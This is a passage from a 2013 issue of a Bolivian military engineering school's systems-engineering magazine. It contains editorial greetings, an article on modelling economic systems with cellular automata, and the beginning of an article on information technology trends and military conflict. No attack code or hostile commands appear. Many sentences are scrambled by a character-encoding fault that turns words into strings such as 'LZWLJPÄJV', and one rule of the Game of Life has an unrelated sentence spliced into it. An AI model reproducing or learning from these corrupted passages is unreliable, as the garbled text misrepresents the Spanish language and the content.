Escuela Militar de Ingeniería, Carrera de ingeniería de Sistemas,Unidad Académica La Paz La Paz, Noviembre de 2013 EQUIPO EDITORIAL: Director: Director vitalicio Editor: Diagramación: Tcnl. DIM. Julio Cesar Narváez Tamayo Lic. Fernando Yañez Romero Ing. Freddy Medina Miranda Univ. Diego Feraudy Pinto TF. CGON. Raúl Gilmar Cortez Laura TF. CGON. Mario Rubén Ontiveros Daza Tte. Com. Rolando Sánchez Montalvo Diseño de la Portada: Univ. César Antonio Narváez Gutierrez [email protected] fyañ[email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] EDICIÓN TECNICA: Escuela militar de Ingeniería Unidad Académica La Paz Carrera de Ingeniería de Sistemas Irpavi, La Paz - Bolivia Tel. (0 591) 2775536 URL: www.emi.edu.bo E-mail: [email protected] Reservados todos los derechos de reproducción total o parcial del contenido de esta revista Copyright © 2013 Ingeniería de Sistemas P A R A D I G M A 1 P R A D I G M A 2 CONTENIDO A PÁGINA 1. Editorial del Señor Jefe de Carrera de Ingeniería de Sistemas ............................ 3 2. Presentación del Señor Rector de la EMI ........................................................... 4 3. Presentación del Señor Vice rector de la EMI ..................................................... 5 4. Presentación del Señor Director de la Unidad Académica La Paz ..................... 6 5. Artículos de docentes ........................................................................................ 7 6. Artículos de estudiantes .................................................................................... 46 7. Proyectos de la Carrera ..................................................................................... 73 8. Actividades de la Carrera .................................................................................. 79 9. Estudiantes de la Carrera .................................................................................. 85 10. Información de las Carreras de la EMI ............................................................. 93 EDITORIAL Hoy más que en el pasado la administración del conocimiento juega un papel importante en la competitividad de cualquier persona, profesional, empresa y en general, cualquier organización que proyecte un crecimiento a largo plazo. Esto muestra claramente que una de las decisiones importantes para lograr los objetivos es invertir tiempo y recursos en formación, investigación y capacitación. Con el transcurso del tiempo, la evolución de la Ingeniería de Sistemas, el Modelaje y la Simulación y las Tecnologías de Información y Comunicación (TIC’s) han permitido que la investigación, la formación y capacitación estén al alcance rápido y efectivo en cualquier momento, y esto lo conocemos hoy por un lado como Educación Virtual o el término técnico E-Learning y por otro lado por la difusión de las investigaciones a través de las revistas electrónicas. ,Z[L JVUJLW[V LTWPLaH WVY LS YVTWPTPLU[V KLS WHYHKPNTH X\L PKLU[PÄJHIH HS KVJLU[L PU]LZtigador como el eje de cualquier programa de profesionalización, donde sin su guía era difícil poder tener una aprehensión de generación y transmisión del conocimiento efectiva, así como una validación de dudas que en el transcurso del tiempo se van presentando. Con este modelo, el sujeto que pasa a ser el eje del programa de aprendizaje por competencias es el estudiante, y alrededor de él giran las herramientas, bibliotecas digitales, objetos de investigación y aprenKPaHQLYLKLZKLJVSHIVYHJP}U`LSTPZTVKVJLU[L`HX\LLSVIQL[P]VÄUHSLZX\LLSLZ[\KPHU[L entienda, interiorice, investigue y practique cuantas veces quiera los temas objeto de la formación y capacitación de competencias. Todo este avance se evidencia con la tendencia mundial que exponen los centros de formación e investigación, las empresas y las organizaciones de los países desarrollados al implementar tecnologías E-Learning para sus sistemas de aprendizaje por competencias, con el objetivo de optimizar los procesos de formación y capacitación y entrenamiento al personal interno y externo en las diferentes dependencias, por medio de desarrollos innovadores de ciencia y tecnología para generar ahorros en tiempo y dinero; asimismo lograr mejorar la calidad de la formación, de comunicación y retención de la conocimientos e información, para que los procesos de entendimiento y adaptación a los nuevos cambios se lleven a cabo con más y mejores resultados. El sistema de educación virtual evidentemente debe ir estructurado en un proceso lógico pedagógico para su ejecución, y adicionalmente vincular una mezcla de diferentes niveles de laboratorios virtuales y publicación de revistas virtuales para lograr los objetivos. Como en los demás ámbitos de la actividad humana, las TIC’s y las revistas se convierten en instrumentos cada vez más indispensables en las instituciones educativas, empresas y desde luego la Revista PARADIGMA se encuentra en esta línea. Esto abre y amplía el espacio educativo, aportando una interculturalidad que enriquece los sistemas de enseñanza y la difusión de las investigaciones efectuadas por docentes y estudiantes. Los últimos veinticinco años del siglo ??LZ[mUTHYJHKVZWVY\UHHJLSLYHJP}UJYLJPLU[LKLSKLZHYYVSSVJPLU[xÄJV[LJUVS}NPJVLSJ\HSZL THUPÄLZ[H[HU[VLUSVZJVUVJPTPLU[VZJVTVLUSHZU\L]HZTL[VKVSVNxHZX\LPU[LNYHUSVZUP]LSLZ teórico-prácticos a través de modelos, simulaciones, pronósticos, planeamiento, diseño, etc. ,UM\UJP}UHSVL_W\LZ[VSHYL]PZ[H7(9(+0.4(ZLPKLU[PÄJHJSHYHTLU[LJVULSKPYLJJPVUHTPLU[V estratégico de empresas, instituciones educativas y organizaciones en general, se orienta a la formación constante del capital humano que las conforma, ya que es inevitable aceptar que es por este capital que se logra o no el correcto funcionamiento y el éxito de éstas; adicionalmente, el acceso al conocimiento está más al alcance con el uso de la tecnología, y por tal motivo no podemos dejar de lado esta gran oportunidad de generar una competitividad globalizada por el miedo a romper el paradigma cultural del uso de las nuevas herramientas tecnológicas de formación y capacitación expuestos por los trabajos en la revista que se pone a su consideración. Tcnl. DIM. Julio Cesar Narváez Tamayo JEFE DEPARTAMENTO INGENIERÍA DE SISTEMAS P A R A D I G M A 3 P R A D I G M A 4 RECTOR A Gral. Brig. Alfredo Marquina Lozada MAGNÍFICO RECTOR DE LA ESCUELA MILITAR DE INGENIERÍA La Escuela Militar de Ingeniería, integrante del Sistema de la Universidad Boliviana, con una experiencia de más de 60 años formando profesionales del más alto nivel académico, está implementando nuevos planes de estudios en sus Carreras, con un modelo académico por competencias, en el que son pilares fundamentales la investigación y la interacción social. Los proyectos y trabajos que en estos ámbitos desarrolla la comunidad docente estudiantil y la jefatura de cada Carrera de la EMI, son valiosos aportes para la consolidación del diseño curricular por competencias. Como Rector de la Escuela Militar de Ingeniería, tengo la grata satisfacción de presentarles la Revista Paradigma, en su décima segunda edición, elaborada por la Carrera KL0UNLUPLYxHKL:PZ[LTHZJVULZM\LYaVKLKPJHJP}U`ZHJYPÄJPVJ\`VJVU[LUPKVLZ\UH T\LZ[YHKLSHJVUZ[HU[LHJ[\HSPaHJP}UWYVK\JJP}UJPLU[xÄJH`HJ[P]PKHKLZKLSHJVT\UPdad universitaria. La Revista contribuye a la formación integral de los estudiantes, preparándolos para actuar positivamente en las necesarias transformaciones sociales, ambientales, económicas, culturales y tecnológicas, además de ser un espacio de difusión para la Carrera y para la EMI. VICERRECTOR P A R Cnl. DAEN. Marco Antonio Barrero Argote VICERRECTOR DE LA ESCUELA MILITAR DE INGENIERÍA Representa para mí una gran satisfacción el poder dar este mensaje de salutación con motivo de la 12va Edición de la Revista Paradigma de la Carrera de Ingeniería de Sistemas. Nuestro país atraviesa un proceso de construcción del nuevo Estado Plurinacional, en el cual la aspiración de lograr la soberanía tecnológica, es un anhelo de todos aquellos que formamos parte de la comunidad académica de la Escuela Militar de Ingeniería. Sin duda alguna, los elementos claves para lograr el desarrollo de una sociedad diversa y plurilingüe, son la ciencia, la tecnología y la innovación. Muestras de ello existen tanto en el viejo mundo como en nuestra América Morena. A D I Un papel determinante en este llamado siglo del conocimiento lo constituyen las Tecnologías de Información y Comunicación (TIC´s), las cuales han transformado nuestra forma de vivir sumergiéndola en dimensiones jamás pensadas, hace unos 40 años atrás los que éramos adolescentes cultivamos parte de nuestras relaciones sociales a través del correo convencional, hoy a través de un clik podemos dar inicio a las relaciones soJPHSLZUVJVU\UHZPUVJVUJPLU[VZKLWLYZVUHZUVZVSVLUU\LZ[YHmYLHNLVNYmÄJHZPUV a través del mundo entero. G La trasmisión y divulgación del conocimiento son esenciales para las sociedades que desean perdurar en el tiempo, es así que esta nueva Edición de la Revista Paradigma [PLUL\UHPTWVY[HUJPHZPNUPÄJH[P]HUVZVSVWVY[YHZJLUKLYLULSJYVUVZZPUV[HTIPtUWVY aportar a la construcción del Vivir Bien. M A 5 A R A D I G M A 6 DIRECTOR UALPZ P Cnl. DAEN. Álvaro Alfonso Ríos Oliver DIRECTOR DE LA UNIDAD ACADÉMICA LA PAZ Una vez más tengo el privilegio de ser partícipe de la publicación de una nueva versión de la Revista PARADIGMA de la Carrera de Ingeniería de Sistemas. Indudablemente, un esfuerzo de gente con un gran compromiso institucional que, a través de los años, le ha dado continuidad a la posibilidad de plasmar y difundir artículos y trabajos de investigación de docentes y estudiantes de la Carrera. La educación, la interacción social y la investigación son las bases de la gestión universi[HYPH;VKVLSLZM\LYaVKLZHYYVSSHKVLU[VYUVHSHPU]LZ[PNHJP}U¶WVJVT\JOVZ\ÄJPLU[L VPUZ\ÄJPLU[LLZ[LTHKLV[YVKLIH[L¶X\LKHLULSHUVUPTH[VZPUVZLLUJ\LU[YHUSVZ mecanismos que hagan posible la difusión interna y externa. La posibilidad de trascender queda plasmada en las páginas de esta revista cuyas temáticas, tengo la certeza, encontrarán el interés de sus lectores y permitirán el surgimiento de nuevas inquietudes porque, como dice José Ingenieros: “En la historia de su sociedad solo vive el que deja rastros en las cosas o en los espíritus”. MODELADO DE SISTEMAS ECONÓMICOS CON AUTÓMATAS CELULARES Yáñez Romero Fernando – Yáñez Bernal Juan Fernando. Calle Juan Manuel Loza 1776 – Condominio San Andrés. 4PYHÅVYLZ¶3H7Ha)VSP]PH Telf.: 2227960 e-mail: [email protected] RESUMEN BREVE TEORÍA DE AUTÓMATAS CELULARES La presente comunicación se encarga de presentar un método - herramienta adecuada para tratar sistemas dinámicos discretos como ser los procesos socio-económicos a través de los autómatas celulares, de ahí que el propósito de la comunicación es el de la modelación de sistemas económicos mediante el empleo de autómatas celulares. Al respecto el establecimiento de métodos para el modelaje no tradicional de sistemas complejo conÅPJ[P]VZVIQL[VKLLZ[\KPVKLSH0UNLUPLYxHKL:PZtemas ocupa un lugar predominante dentro de las tareas de esta profesión actualmente, Sin embargo, muchos de estos métodos solo permiten abordar problemas dinámico discretos en el tiempo y en esWHJPVZPLUKVPUJHWHJLZKLYLÅLQHYLSJHYmJ[LYKPUmmico continuo de los sistemas, donde una decisión presente afecta futuros eventos inmediatos. Dentro de estos métodos no tradicionales se encuentran los Autómatas Celulares que se caracterizan por absolver la anterior restricción de ahí que es una de las herramientas que necesariamente debe saber utilizar un Ingeniero de Sistemas. Un autómata celular constituye un sistema dinámico discreto que es una colección de células idénticas que se encuentran conectadas entre sí. Todas las células conforman la denominada red del autómata celular. Estas redes pueden ser de distintos tipos y diferentes en cuanto a las dimensiones y la forma de las células. INTRODUCCIÓN En las simulaciones de los procesos sociales y económicos desde hace tiempo son ampliamente utilizados los métodos matemáticos tradicionales tales como: las expresiones de la dinámica del proceso en términos de ecuaciones diferenciales y en diferenJPHZÄUP[HZ`Z\ZZVS\JPVULZHUHSx[PJHZVU\TtYPJHZ posteriores. Sin embargo actualmente una solución prometedora para las áreas problemáticas de la descripción matemática de los fenómenos sociales y económicos viene a ser el empleo de enfoques no tradicionales para la construcción de modelos matemáticos. Entre estos enfoques se tiene en particular los modelos basados en autómatas celulares que vienen a ser sistemas discretos cuyo comportamiento está completamente determinado por la dependencia del entorno local en el tiempo y en el espacio. En si cada célula viene a ser una maquina de estaKVZ ÄUP[VZ J\`V LZ[HKV LZ[m KL[LYTPUHKV WVY SVZ estados de las células vecinas y posiblemente de la propia célula. En general los autómatas celulares tienen las siguientes propiedades: El cambio de los valores de todas las células o celdas ocurre simultáneamente después de calcular el nuevo estado de cada célula de la red La red o parrilla es homogénea, es decir es imposible distinguir entre dos regiones de la red a través del universo bajo estudio, en cuanto a su naturaleza. Las interacciones son locales, es decir solo las JtS\SHZKLSHaVUHKLSLU[VYUVSVJHSW\LKLUPUÅ\PY en esta célula, lo que da lugar a los distintos tipos de vecindades. ,SJVUQ\U[VKLLZ[HKVZKLSHZJtS\SHZLZÄUP[V<UV de los ejemplos más simples de autómatas celulares viene a ser el famoso “Juego de la Vida” que fue propuesto por John Horton Conway en 1970. REGLAS DEL JUEGO DE LA VIDA Si para cierta célula viva o muerta (ocupada o desocupada) se tiene exactamente tres de sus células vecinas ocupadas entonces la célula en cuestión estará ocupada o viva en el siguiente momento del tiempo. Si para cierta célula ocupada están también ocupadas dos de sus células vecinas entonces esta P A R A D I G M A 7 P A célula estará ocupada en el siguiente momento del tiempo. Se desplaza o mueve a esta celda y coge todo el dinero que se encuentra en esta celda. En todos los otros casos o situaciones entonces en el siguiente momento del tiempo esta célula se encontrara desocupada o muerta. ( es decir si la población es demasiado densa o viceversa entonces esto lleva a la imposibilidad de sobrevivencia de la vida) De esta manera la cantidad de activos del agente se adiciona lo obtenido a lo que había previamente y se resta los gastos requeridos en este intervalo de tiempo. De hecho el agente muere si no dispone de recurso, es decir entra en quiebra. MODELADO DE MERCADO BASADO EN EL JUEGO DE LA VIDA R A D I G Para la construcción de este modelo se asume que LSLZWHJPVLZ[mKLÄUPKVKLSHZPN\PLU[LTHULYH! La red es bidimensional En cada célula o celda se muestra el número actual KLSVZYLJ\YZVZÄUHUJPLYVZ`SHJHU[PKHKTm_PTHKL estos que puede existir en cada celda. La distribución o asignación de estos recursos se concreta en el espacio de modo que por lo general los picos están ubicados en el norte-este y el sur-oeste. 7VYV[YHWHY[LLSTVU[VKLSVZYLJ\YZVZÄUHUJPLYVZ de la célula o celda se reduce hasta el nivel máximo de la función rampa. (Se asume que el comportamiento del consumidor es similar en los distintos mercados y en la actitud respecto a los diferentes grupos de productos). 7HYHJHKHHNLU[LZLLZWLJPÄJHSHJHU[PKHKKLYLJ\YZVZÄUHUJPLYVZX\LKLILUZLYJVUZ\TPKVZWVY unidad de tiempo. Cada agente tiene un stock de recursos que puede llevar consigo de una célula a otra (variable). En este caso no importa si el agente recibe fondos a través de la venta de bienes o por otra forma de recaudación de fondos. M El agente puede o tiene la capacidad de observar su entorno local o vecindad y en base a esto se puede desplazar a las celdas vecinas en base a las siguientes reglas de comportamiento de los agentes. A Inspecciona las células disponibles a la vista y seSLJJPVUHSHZJLSKHZ]HJxHZJVUTmZYLJ\YZVZÄUHUcieros. 8 Si hay mas de una de estas celdas, entonces elige la mas cercana. +LOLJOVHÄUKLTVKLSHYSHPUUV]HJP}UKLSJVTportamiento de los agentes de la celda, además de la cantidad de recursos se establece otra característica que viene a ser “el grado de innovación”, es decir el nivel de distinción del negocio (productos/ servicios/tecnología) en el agente que esta presente en el momento dado. En si el nivel de innovación LZWYVWVYJPVUHSHSHJHU[PKHKKLYLJ\YZVZÄUHUJPLros adicionales que serán deducidos de sus activos o que será agregado a ella (como porcentaje de las células disponibles) después de que el agente ha sido transferido a esta celda. La opción de perdida/ganancia se elige aleatoriamente, toda vez que se toma en cuenta que la función de probabilidad viene dada por el experimentador obtenida de los datos empíricos. Desde luego que se asume que esta distribución es desconocida para el agente, por lo que de esta manera se tiene una manera de emular el grado de incertidumbre de los resultados del proceso de innovación. La selección de las celdas se realiza sobre la base de considerar la innovación, sin embargo es distinto para diferentes agentes: El innovador suma el ILULÄJPV`S\LNV[VTHSHKLJPZP}UHJLYJHKLSW\U[V donde se desplazara, mientras que el conservador disminuye, además se puede dar un intervalo del grado de innovación de los agentes (que suma/resta solo parte del activo potencial). De esta manera aparece la posibilidad de análisis KL JYLJPTPLU[V KL SH JVUÄN\YHJP}U LU [VYUV H SVZ brotes de diferentes grados de estrategias de innovación. Al cambiar los parámetros de los agentes (el grado de innovación, es decir la aversión al riesgo) y los parámetros del entorno de las células se debe cuidar el grado de incertidumbre (es decir que la probabilidad no sea negativa), además el nivel de rentabilidad (es decir la relación entre los costos durante la transición de una célula a otra respecto al nivel de ingresos). De este modo es posible obtener situaciones típiJHZ X\L ZL W\LKLU PKLU[PÄJHY JVU SHZ LZ[YH[LNPHZ reales de las pequeñas empresas innovadoras. La presencia en el campo de una gran cantidad de agentes que disponen de reservas medianas de re- J\YZVZÄUHUJPLYVZOHJLX\LLSUP]LSKLTVY[HSPKHK sea mediano, esta situación del modelo es tal que se corresponde con estrategias reales de la categoría de búsqueda desintegrado. La presencia en el campo de una gran media de agentes que disponen de grandes reservas de reJ\YZVZÄUHUJPLYVZOHJLX\LLSUP]LSKLTVY[HSPKHK sea mediano y su comportamiento tipo sea el de innovador selectivo. MODELO DE DESARROLLO Y GESTIÓN DE TOMA DE DECISIONES Se considera el siguiente ejemplo de modelación del comportamiento de una organización. Cada célula viene a ser una organización concreta, la cual puede con grado diferente y en distintos intervalos de tiempo cumplir las órdenes recibidas. Así existen las siguientes posibilidades de reacción de cada objeto de análisis: Cumplir con la orden o disposición completamente, es decir a un nivel adecuado, con la calidad deseada y en el tiempo estipulado. Cumplir con la disposición parcialmente en el intervalo de tiempo considerado. Cumplir con la disposición completamente pero en un intervalo de tiempo mayor al establecido. En principio no cumplir con la disposición requerida, en particular se reconduce la orden hacia otra organización. El modelo de autómata celular que se obtiene resultado de estos supuestos considera que reacciones semejantes del objeto se determinan bajo ciertas reglas constantes para la célula dada en el transcurso de cierto intervalo de tiempo. Estas reglas para una organización concreta de control tiene un JHYmJ[LY LZWLJPÄJV ` YLÅLQH SHZ WVZPIPSPKHKLZ WYVfesionales y psíquicas particulares de los dependientes del microclima del contenido y el numero de otros participantes que han recibido al mismo tiempo la orden o disposición, así como de las relaciones con otras organizaciones y sus direcciones, etc. La selección de una determinada acción lleva un carácter probabilístico. Una distribución concreta de estas reacciones depende de las particularidades dadas de una señal concreta que llega a ella como entrada, es decir en este caso la particularidad de la disposición u orden obtenida. Para el desarrollo de las reglas de comportamiento de todas las células del autómata de la clase dada en primer lugar es necesario determinar aquellos que son comunes para todos sus factores, es decir las características de las señales de entrada (ordenes) en dependencia de las cuales, las células eligen un determinado carácter de sus reacciones. Las características mas importantes de las ordenes que determinan la reacción de la organización vienen a ser las siguientes: 1.- Su complejidad, que es un indicador agregado que conlleva un carácter objetivo, es deJPY UV KLWLUKL SH J\HSPÄJHJP}U KLS WLYZVUHS de una unidad o departamento concreto, de la productividad de su trabajo, etc. Además que incluye los siguientes momentos: :\NYHKVKLTV[P]HJP}UX\LYLÅLQHLSPU[LYtZ del personal de la unidad o departamento en la ejecución de una orden recibida. 3.- Su grado de compromiso que determina la presión sobre el personal de la unidad o departamento por parte de la dirección o de la gerencia que esta interesada en el cumplimiento de la orden recibida. Cada uno de estos tres factores puede tomar distintos valores, por ejemplo: bajo, medio y alto. Para la descripción de cada celda del autómata celular se requiere sobre la base de base una información estadística determinada o a través de la observación formular reglas individuales de comportamiento de los objetos analizados para cada uno de las posibles combinaciones de los valores de los factores, considerados. P A R A D I Sobre la base de la información obtenida se podrá: Determinar las zonas de carga máxima y mínima dentro de la estructura organizativa bajo el diseño y toma de decisiones de control, en particular las zonas de sobrecarga según sus elementos y periodos de tiempo. G Determinar en la organización las zonas de máxima y mínima carga, lo más complejo en particular es la no estandarización de la carga de trabajo y la creatividad y también las soluciones de control obligatorias y atractivas. M Analizar las más importantes unidades o departamentos de enlaces de comunicación presentes. Analizar la estructura de los contenidos de trabajo de cada una de las unidades o departamentos de gestión y control, es decir la fracción de cada uno de los tipos obtenidos en su carga general o total, así como en términos de la cantidad de este ultimo y en el tiempo de ejecución. A 9 P Elegir y separar las combinaciones mas típicas de los distintos tipos de problemas que se concretan por cada una de los departamentos o unidades, en particular en los periodos de sobrecarga máxima. A Determinar en cuanto son complejas (la sobrecarga, la estandarización y la creatividad) las actividades de la unidad o departamento y también como se relaciona motivación interna con las presiones externas. R A D I G M A 10 En principio una dirección fundamental de empleo de este tipo de modelo de autómatas celulares viene a ser la posibilidad de formular el pronóstico de comportamiento de la organización desde el punto de vista del desarrollo y ejecución de las decisiones de control para distintas variantes de la estructura de la organización para distintas obligaciones y esquemas de reorganización. Partiendo del supuesto que la regla de respuesta de cada una de las celdas del autómata celular LZ SV Z\ÄJPLU[LTLU[L LZ[HISL WHYH JPLY[V PU[LY]HSV de tiempo bajo la provisión de los parámetros de SHZ VYKLULZ KLS Å\QV KL LU[YHKH LU LS ZLU[PKV KL las características dadas es posible pronosticar el comportamiento de cada una de las unidades o departamentos y aquellos problemas importantes con los cuales se enfrenta como resultado de la reorganización. La información fuente necesaria para la modelación, en este caso viene a ser: ,SJHTIPVKLSHZJHYHJ[LYxZ[PJHZKLSVZ[PWVZ fundamentales de órdenes, en el sentido de su complejidad, responsabilidad y motivación. *VTV YLZ\S[HKV KL LZ[H TVKLSHJP}U ZL WVdrá pronosticar los siguientes momentos: +L[LYTPUHY SHZ aVUHZ ` WLYPVKVZ KL WVZPISL sobrecar5ga de la estructura organizativa y también las unidades que realizaran las más complejas decisiones de control responsable y atractivo. 0KLU[PÄJHY SVZ WYPUJPWHSLZ WYVISLTHZ X\L ZL pueden enfrentar las unidades, incluyendo la MHS[HKLMVYTHJP}USHJ\HSPÄJHJP}USHMHS[HKL WYVJLKPTPLU[V LZWLJxÄJV WHYH SH HWSPJHJP}U de determinadas decisiones, etc. 0KLU[PÄJHYHSHZ\UPKHKLZKLPU[LYJVUL_P}UKL las comunicaciones mas importantes. Este tipo de pronostico permite con anterioridad desarrollar propuestas para el ajuste de la precisión de la estructura organizativa, en particular los cambios en el número de unidades, cambios en la lista de responsabilidades del trabajo, mejora en el nivel general de habilidades, motivación, etc. Por lo tanto, el uso del esquema dado de investigación y análisis de los procesos de desarrollo y la toma de decisiones en la organización debe ser capaz de contribuir a la eliminación de una serie de factores que afectan negativamente la calidad de las decisiones y para desarrollar una versión veriÄJHKHWHYHSHTLQVYHKLSHLZ[Y\J[\YHVYNHUPaH[P]H CONCLUSIONES Y RECOMENDACIONES En general cabe señalar que el autómata celular ha sido utilizado para el modelado de sistemas económicos, cumpliendo de esta manera con los propósitos del trabajo propuesto, Sin embargo este trabajo puede trascender en otras áreas del conocimiento, sobre todo las ligadas a los procesos sociales y económicos, campos donde aun el empleo de autómatas celulares no han sido ampliamente utilizados, así pues que nuestra comunicación en nuestro medio realiza los primeros pasos en la difusión de la utilización de autómatas celulares en el establecimiento del comportamiento de sistemas socio-económicos, REFERENCIAS BIBLIOGRÁFICAS Modelación de la Dinámica Sociopolítica y Económica, M RSSu, 2004. Autómatas Celulares, Implementación y Experimentación, Lev Nauman, 2009. El Juego de la Vida, www.artsoc.ru/lifemodel. htm, 2009 Comportamiento y Estrategia de las Pequeñas empresas Innovadoras y Simulación Basada en SH*YLHJP}UKL*VT\UPKHKLZ(Y[PÄJPHSLZ, A. Platonov, 2011 Mejora de los Procesos de Desarrollo y Toma de Decisiones en la Educación Superior, N. Titova, 2004. TENDENCIAS DE LA EVOLUCIÓN DE LAS TECNOLOGÍAS DE INFORMACIÓN Y COMUNICACIÓN Y EL CONFLICTO P A Cnl. DAEN. Álvaro A. Ríos Oliver RESUMEN El impacto de las Tecnologías de Información y Comunicación es insoslayable a todos los ámbitos del quehacer humano. En el mundo actual, los descuIYPTPLU[VZJPLU[xÄJVZ`LSH]HUJL[LJUVS}NPJVJVUsecuente, poseen una importancia decisiva en el desarrollo integral de los países y en el bienestar de sus habitantes. No hay un esquema universal para alcanzar la sociedad de alto desarrollo que se desea alcanzar pero, los países que renuncian a crecer rápidamente, o no encuentran la alquimia necesaria para hacerlo, están condenados de manera inexorable a la dependencia externa. La industria de la Defensa y Seguridad ha abordado permanentemente un proceso de reestructuración apostando decididamente por la innovación tecnológica. ABSTRACT The Impact of Information and Communication Technology is inevitable to all areas of human enKLH]VY0U[VKH`»Z^VYSKZJPLU[PÄJKPZJV]LYPLZHUK technological progress consequent, have a decisive importance in the development of countries and the welfare of its inhabitants. There is no universal scheme for highly developed society to be achieved but waive countries grow rapidly, or alchemy are not required to do so, are doomed inexorably to the external dependency. Defence Industry and Security has addressed a restructuring process permanently betting strongly on technological innovation. INTRODUCCIÓN La tecnología ya ha ampliado el alcance de los conÅPJ[VZKLSVZLU[VYUVZKLSH[PLYYHTHY`HPYLWHYH incluir el ciberespacio y el espacio. Ofrece nuevas WVZPIPSPKHKLZWHYHLSJVUÅPJ[V`LZL_WSV[HKHH[YHvés de innovaciones en la organización, estrategia y la táctica. La rápida innovación tecnológica tendrá \UPTWHJ[VZPNUPÄJH[P]VLULSJHYmJ[LYL]VS\[P]VKL SVZJVUÅPJ[VZ:LN\PYmZPLUKV\UHYTHKLKVISLÄSV que ofrecerá ventajas a las grandes potencias capaces de pagar las tecnologías más avanzadas, así como también a los empresarios y los innovadores que colaboran para encontrar nuevos usos para las tecnologías existentes. Estos empresarios, incluyendo los Estados más pequeños y los actores no estatales, rápidamente serán capaces de adaptar las estrategias, mientras que las grandes potencias son todavía propensas a sufrir KLSHPULYJPHPUZ[P[\JPVUHS`SHYLZPZ[LUJPHÄUHUJPLYH asociadas a los programas de armas de gran tamaño. Es probable que la vanguardia del desarrollo tecnológico continúe cambiando desde el Estado hacia el sector comercial. La proliferación de los sistemas comerciales y tecnologías permitirá que aliados y adversarios sean equipados de forma similar, si pueden permitirse el lujo de comprar en el mercado abierto. Estados en desarrollo y actores no estatales serán capaces de explotar rápidamente tecnologías nuevas y en evolución a bajo coste, para obtener una ventaja asimétrica. Sin embargo, la tendencia hacia el sector comercial puede ralentizar o incluso invertirse a medida que los Estados se centran en su propio interés e invierten en investigación para combatir el cambio climático, la escasez de recursos y otros desafíos. +LZKL LS ÄUHS KL SH .\LYYH -YxH SVZ TH`VYLZ WYVveedores de armas convencionales a los mercados internacionales han sido los EE.UU., Rusia, Alemania, Francia y el Reino Unido. Los principales compradores han sido China y la India, con Asia contabilizando el 37% del comercio, Europa 23%, y Oriente Medio el 22% (SIPRI, 2008). El nivel general de las transferencias se ha incrementado desde un mínimo en 2002 y está valorado en alrededor de $ 45 millones al año. Requerimientos adelantados sugieren que es probable que el R A D I G M A 11 P A R A D I G M A 12 volumen de transferencias internacionales de armas aumente durante la primera mitad del períoKV ` X\L (YHIPH :H\KP[H 3PIPH ` ;HP^mU ÄN\YHYxHU como los principales importadores. Los desafíos estratégicos que en el futuro enfrentarán las grandes potencias es poco probable que se resuelvan por sí solos por el efecto mágico de la tecnología. Sin embargo, los Estados más ricos, especialmente aquellos con poblaciones en ajuste, puede verse seducidos en favor de complejas soluciones tecnológicas por sobre enfoques humanos TmZ[YHKPJPVUHSLZHWLZHYKLKPÄJ\S[HKLZWHYHJ\brir los costos asociados. El predominio de la calidad tecnológica sobre la JHU[PKHK LQLTWSPÄJHKV WVY SHZ MHZLZ JVU]LUJPVnales de combate de las guerras del Golfo, donde SHTHZHM\LZ\Z[P[\PKHWVYHYTHTLU[VZVÄZ[PJHKV y mejoras en la organización y la formación, será KLZHÄHKV ,S ]HSVY KL SV O\THUV ZLN\PYm ZPLUKV crítico en las operaciones centradas en las perZVUHZKVUKLSHPUÅ\LUJPHLZKL]P[HSPTWVY[HUJPH y algunas tareas militares seguirán siendo intensivas en mano de obra y equipos. La tendencia hacia sistemas de armas altamente especializados, que prevaleció durante la Guerra Fría, ha dado lugar a su adaptación para su uso en nuevos contextos. Sin embargo, los altos costos asociados, tecnologías nuevas de armas y la gran cantidad de posibles tareas que pueden enfrentar los militares hacen que las armas simples, versátiles y cinéticas sean invaluables. Esto es cierto para países desarrollados, pero también para actores irregulares que tratan de utilizar las HYTHZ ZLUJPSSHZ ÅL_PISLZ ` KL IHQV JVZ[V [HSLZ como artefactos explosivos improvisados para SVNYHY LMLJ[VZ LU [VKVZ SVZ UP]LSLZ KL JVUÅPJ[V La tecnología inevitablemente se extiende y ninguna fuerza militar ha disfrutado del monopolio a perpetuidad de cualquier capacidad. Es probable que la ventaja tecnológica disfrutada por Occidente desde 1945, sea erosionada por la difusión tecnológica y el fortalecimiento de la Investigación y Desarrollo (I + D), particularmente en Asia, que se alimenta a través de la producción de armas. Por ejemplo, en algunas áreas, es probable que el material militar chino para su exportación a potenciales adversarios sea comparable a los equipos europeos proyectados para el año 2020 y se aproximen los estándares de los EE.UU. para el 2040 (Bowns y Middleton, 2006). Es probable que la paridad tecnológica se constituya en un desafío al paradigma occidental de la guerra, que la tecnología puede sustituir a la masa y dar lugar a un efecto rápido y decisivo (Bowns y Cornish, 2009). Por otra parte, es probable que el combate entre adversarios igualmente emparejados resulte en una escalada del número de bajas. Este cambio de paradigma también requiere la capacidad de WSHUPÄJHYWHYHTVKVZKLJVUÅPJ[VJVUHK]LYZHYPVZ que alcancen capacidades clave de alta tecnología y empleen conceptos innovadores de operación (RAND, 2009). Por ejemplo, los poderes regionales armados con misiles guiados de precisión y tecnologías anti-acceso, tales como los submarinos, misiles de cruJLYV`ZVÄZ[PJHKVZTPZPSLZ[PLYYHHPYLW\LKLOHJLY que la proyección de estrategias tradicionales de poder sea inviable. El desarrollo de sistemas en red va a continuar. El acceso a la información estimulará el conocimiento y la comprensión, y actuará como un facilitador funKHTLU[HSLU\UM\[\YVJVUÅPJ[V3VZHJ[VYLZPYYLN\lares seguirán utilizando la tecnología ampliamente disponible, tales como Internet, tanto para ocultar como para promover sus actividades. Del mismo modo, los Estados desarrollados buscarán integrar y sincronizar plataformas, sensores y tiradores en un intento de disminuir la “niebla de guerra”. A pesar de que las mejoras técnicas serán considerables, es probable que la ventaja táctica sea de corta duración, a medida que los adversarios se adaptan rápidamente. La omnipresencia de las TIC permitirá a más perZVUHZHJJLKLY`L_WSV[HYSHZZVÄZ[PJHKHZYLKLZKL los sistemas de información. Por ejemplo, en 2007 hubo 280 millones de suscriptores de telefonía móvil en África, una tasa de penetración del 30,4%. Este número se espera que aumente a 50% en 2012 y puede dar lugar a una cobertura total en tan sólo diez años. El Internet y las tecnologías asociadas, junto con comunicaciones digitalizadas portátiles, se convertirán cada vez más en el medio por el cual se distribuyen de productos de información audiovisual y escrita de rápida expansión. Para muchas personas, el grupo de pertenencia se extiende más allá de las comunidades físicamente próximas, lo X\LYLÅLQHSHJHWHJPKHKKLTHU[LULYYLSHJPVULZL identidades en la distancia a través de viajes y comunicaciones globalizadas. El tamaño creciente de las redes disponibles también aumentará las 